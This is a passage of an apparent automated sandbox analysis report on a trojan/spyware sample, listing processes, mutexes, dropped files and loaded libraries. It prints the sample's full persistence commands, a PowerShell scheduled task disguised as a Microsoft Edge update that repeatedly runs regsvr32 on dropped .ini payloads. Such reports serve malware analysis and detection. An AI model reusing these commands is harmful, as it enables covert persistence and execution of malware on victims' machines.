                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5D3A4D16_2_00000260AF5D3A4D
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5C48D016_2_00000260AF5C48D0
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5D087416_2_00000260AF5D0874
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5B709416_2_00000260AF5B7094
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5CF94016_2_00000260AF5CF940
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5C591816_2_00000260AF5C5918
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5C3F7016_2_00000260AF5C3F70
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5BD85416_2_00000260AF5BD854
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5CA81C16_2_00000260AF5CA81C
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5AD01016_2_00000260AF5AD010
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5ABEB816_2_00000260AF5ABEB8
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5B86B416_2_00000260AF5B86B4
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5B3EA416_2_00000260AF5B3EA4
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5C5EC816_2_00000260AF5C5EC8
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5B768416_2_00000260AF5B7684
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5A6F2416_2_00000260AF5A6F24
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 16_2_00000260AF5AC75016_2_00000260AF5AC750
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\4smg.ini BE86E0357748F3B4FA166342F284800A83C955C2C8B197475C2450613A6EED67
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\oSyU.ini 55A451457DBC1F6D28A4C1AB2D477FBBFAE002999A0789C9F3D1BD6610511D98
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\utox_x86_x64.exe D7BD224B2EF0014C679046C917BECFFACE5F5ABA2FBDB7DD3C17FE964C3CEE97
                        Source: C:\Users\Public\ajbs50ul.batCode function: String function: 00007FF79E99D4B0 appears 72 times
                        Source: C:\Users\Public\ajbs50ul.batCode function: String function: 00007FF79E987290 appears 129 times
                        Source: C:\Users\Public\ajbs50ul.batCode function: String function: 00007FF79E98C9D0 appears 64 times
                        Source: C:\Users\Public\ajbs50ul.batCode function: String function: 00007FF79E950EF0 appears 40 times
                        Source: C:\Users\Public\ajbs50ul.batCode function: String function: 00007FF79E987030 appears 31 times
                        Source: C:\Users\Public\ajbs50ul.batCode function: String function: 00007FF79E99C954 appears 41 times
                        Source: C:\Users\Public\ajbs50ul.batCode function: String function: 00007FF79E987520 appears 48 times
                        Source: C:\Users\Public\ajbs50ul.batCode function: String function: 00007FF79E907EF0 appears 224 times
                        Source: ajbs50ul.bat.1.drStatic PE information: Number of sections : 11 > 10
                        Source: 4smg.ini.3.drStatic PE information: Number of sections : 11 > 10
                        Source: utox_x86_x64.exe.1.drStatic PE information: Number of sections : 21 > 10
                        Source: 7.2.regsvr32.exe.13129ac0.3.raw.unpack, Redist.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 7.2.regsvr32.exe.13129ac0.3.raw.unpack, Redist.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 7.3.regsvr32.exe.2d84fa0.6.raw.unpack, Redist.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 7.3.regsvr32.exe.2d84fa0.6.raw.unpack, Redist.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 7.2.regsvr32.exe.2d84fa0.0.raw.unpack, Redist.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 7.2.regsvr32.exe.2d84fa0.0.raw.unpack, Redist.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 7.3.regsvr32.exe.2d84fa0.7.raw.unpack, Redist.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 7.3.regsvr32.exe.2d84fa0.7.raw.unpack, Redist.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 7.2.regsvr32.exe.1b880000.4.raw.unpack, Redist.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 7.2.regsvr32.exe.1b880000.4.raw.unpack, Redist.csCryptographic APIs: 'TransformFinalBlock'
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@28/22@3/31
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9485F0 memset,FormatMessageW,GetLastError,3_2_00007FF79E9485F0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E957140 CreateToolhelp32Snapshot,memset,Module32FirstW,Module32NextW,UnmapViewOfFile,CloseHandle,UnmapViewOfFile,CloseHandle,CloseHandle,3_2_00007FF79E957140
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeCode function: 8_2_00614FA0 CoInitialize,CoInitialize,CoCreateInstance,CoCreateInstance,CoUninitialize,PeekMessageA,SetEvent,SetEvent,GetMessageA,GetMessageA,CoUninitialize,SetEvent,SetEvent,8_2_00614FA0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\ajbs50ul.batJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2508:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_03
                        Source: C:\Windows\System32\regsvr32.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
                        Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\cbRHd
                        Source: C:\Users\user\Desktop\utox_x86_x64.exeMutant created: \Sessions\1\BaseNamedObjects\uTox
                        Source: C:\Windows\System32\rekeywiz.exeMutant created: \Sessions\1\BaseNamedObjects\MUTEX
                        Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
                        Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\Jason_OsodJpavasJmnlndsto
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d0rpsldo.xy0.ps1Jump to behavior
                        Source: C:\Windows\System32\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                        Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                        Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                        Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                        Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                        Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: OpenWith.exe, 0000000B.00000003.1624834776.000001BD8778D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1629342418.000001BD8779A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: OpenWith.exe, 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                        Source: test.ps1ReversingLabs: Detection: 23%
                        Source: utox_x86_x64.exeString found in binary or memory: impossible: unknown friend-add error
                        Source: utox_x86_x64.exeString found in binary or memory: -h --help Shows this help text.
                        Source: utox_x86_x64.exeString found in binary or memory: -h --help Shows this help text.
                        Source: utox_x86_x64.exeString found in binary or memory: Search/Add Friends
                        Source: OpenWith.exeString found in binary or memory: ext-ms-win-security-authz-helper-l1-1-0.dll
                        Source: OpenWith.exeString found in binary or memory: api-ms-win-stateseparation-helpers-l1-1-0.dll
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\test.ps1"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\ajbs50ul.bat "C:\Users\Public\ajbs50ul.bat"
                        Source: C:\Users\Public\ajbs50ul.batProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Desktop\utox_x86_x64.exe "C:\Users\user\Desktop\utox_x86_x64.exe"
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
                        Source: C:\Users\Public\ajbs50ul.batProcess created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini
                        Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Program Files\Windows Media Player\wmpnscfg.exe "C:\Program Files\Windows Media Player\wmpnscfg.exe"
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"
                        Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"
                        Source: C:\Windows\System32\rekeywiz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{848CC004-CC00-4888-C000-44488CCC0488}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini
                        Source: C:\Windows\System32\rekeywiz.exeProcess created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\ajbs50ul.bat "C:\Users\Public\ajbs50ul.bat" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Desktop\utox_x86_x64.exe "C:\Users\user\Desktop\utox_x86_x64.exe" Jump to behavior
                        Source: C:\Users\Public\ajbs50ul.batProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"Jump to behavior
                        Source: C:\Users\Public\ajbs50ul.batProcess created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.iniJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"Jump to behavior
                        Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Program Files\Windows Media Player\wmpnscfg.exe "C:\Program Files\Windows Media Player\wmpnscfg.exe"Jump to behavior
                        Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"Jump to behavior
                        Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"Jump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\rekeywiz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{848CC004-CC00-4888-C000-44488CCC0488}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
                        Source: C:\Windows\System32\rekeywiz.exeProcess created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
